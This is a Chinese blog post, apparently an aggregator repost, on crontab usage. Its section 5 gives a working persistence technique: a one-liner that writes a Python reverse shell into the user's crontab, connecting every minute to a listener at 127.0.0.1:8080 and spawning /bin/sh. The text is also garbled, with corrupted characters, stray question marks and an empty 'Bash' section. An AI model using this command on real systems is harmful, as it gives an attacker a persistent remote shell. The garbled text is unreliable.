1. 編輯定時(shí)任務(wù)

crontab -e

linux通用路徑：/etc/crontab

ubuntu被編輯的文件路徑一般為：/var/spool/cron/crontabs/當(dāng)前用戶

centos被編輯的文件路徑一般為：/var/spool/cron/當(dāng)前用戶

2. 刪除定時(shí)任務(wù)（情況）

crontab -r

3. 查看現(xiàn)有定時(shí)任務(wù)

crontab -l

4. crountab 定時(shí)任務(wù)規(guī)則編寫

*/5 * * * * Command ??????????????????????每5分鐘執(zhí)行一次命令5 * * * * Command ????????????????????????每小時(shí)的第5分鐘執(zhí)行一次命令 30 18 * * * Command?????????????????????指定每天下午的 6:30 執(zhí)行一次命令? 30 7 8 * * Command??????????????????????指定每月8號(hào)的7：30分執(zhí)行一次命令? 30 5 8 6 * Command?????????????????????指定每年的6月8日5：30執(zhí)行一次命令? 30 6 * * 0 Command??????????????????????指定每星期日的6:30執(zhí)行一次命令

5. 反彈shell

可能大家平時(shí)比較少人ubuntu，所以不大知道這個(gè)特性

測(cè)試結(jié)果：

/etc/crontab和/var/spool/cron/crontabs/，bash -i反彈shell都失敗。不過(guò)python，perl可以，centos和ubuntu都自帶python，perl。

Python

執(zhí)行以下命令，以當(dāng)前bash權(quán)限用戶，創(chuàng)建一個(gè)crontab文件

(crontab -l;printf " * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'n")|crontab -

代碼說(shuō)明：

crontab -將管道符前面的內(nèi)容寫入到當(dāng)前用戶的crontab文件里

• • • • • 表示每一分鐘執(zhí)行該命令，等同于/1?*
          如果是ubuntu的root權(quán)限，以上命令會(huì)寫到/var/spool/cron/crontabs/root文件

如果是centos的root權(quán)限，以上命令會(huì)寫到/var/spool/cron/root, 執(zhí)行成功后，相應(yīng)的crontab文件會(huì)創(chuàng)建或者追加如下內(nèi)容

* * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash

總結(jié)

以上是生活随笔為你收集整理的crontab命令使用记录（精，反弹shell）的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。